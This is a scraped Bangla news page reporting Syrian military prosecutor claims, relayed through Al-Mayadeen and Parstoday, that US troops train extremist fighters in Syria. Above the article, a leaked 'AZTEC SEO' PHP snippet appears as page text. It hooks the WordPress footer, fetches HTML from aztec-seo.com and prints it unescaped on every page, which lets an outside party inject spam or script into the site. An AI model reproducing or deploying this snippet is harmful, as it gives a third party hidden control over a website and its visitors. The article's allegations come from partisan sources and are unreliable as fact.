/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); সিরিয়ায় সন্ত্রাসীদেরকে প্রশিক্ষণ দিচ্ছে মার্কিন সেনারা: নতুন তথ্য-প্রমাণ | Dhaka Sky News

‘ইসরাইলের সঙ্গে কণ্ঠ মিলিয়ে হামাস-বিরোধী প্রচারণায় নেমেছে আমিরাত’

আগের সংবাদ

প্রচণ্ড লড়াই: তালেবানের কাছ থেকে দুটি এলাকার দখল নিল আফগান বাহিনী

পরের সংবাদ

সিরিয়ায় সন্ত্রাসীদেরকে প্রশিক্ষণ দিচ্ছে মার্কিন সেনারা: নতুন তথ্য-প্রমাণ

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: June 13, 2021 , 10:05 pm

সিরিয়ায় দখলদার মার্কিন সেনারা উগ্র তাকফিরি সন্ত্রাসীদেরকে প্রশিক্ষণ দিচ্ছে। সিরিয়ার সামরিক বাহিনীর প্রসিকিউটর অফিস থেকে প্রকাশিত নতুন তথ্য-প্রমাণে এ কথা বলা হয়েছে।

প্রসিকিউটর অফিস থেকে নতুন যে ছবি প্রকাশ করা হয়েছে তাতে দেখা যায়- সিরিয়ার দক্ষিণ-পশ্চিমাঞ্চলীয় আল-তানফ শহরে উগ্রবাদী সন্ত্রাসীরা এবং মার্কিন সেনারা যৌথভাবে টহল দিচ্ছে। গতকাল লেবাননের আল-মায়াদিন টেলিভিশন চ্যানেল এ বিষয়ে একটি প্রতিবেদন প্রচার করেছে।

অন্য ছবিতে দেখা যায়- একজন মার্কিন সামরিক ইনস্ট্রাক্টর উগ্রবাদী সন্ত্রাসীদেরকে বুঝিয়ে দিচ্ছেন কিভাবে ৮২ মিলিমিটারের মর্টার ব্যবহার করতে হয়।

সিরিয়ার সামরিক প্রসিকিউটরের কার্যালয় থেকে প্রকাশিত তথ্য-প্রমাণে আরো বলা হয়েছে- কিছু কিছু ছবিতে সন্ত্রাসীরা ও তাদের ফিল্ড কমান্ডাররা স্বীকার করেছে যে, তারা সিরিয় এবং রাশিয়ার সেনাদের উপর সরাসরি হামলা এবং হত্যাকাণ্ডে অংশ নিয়েছে। সূত্র : পার্সটুডে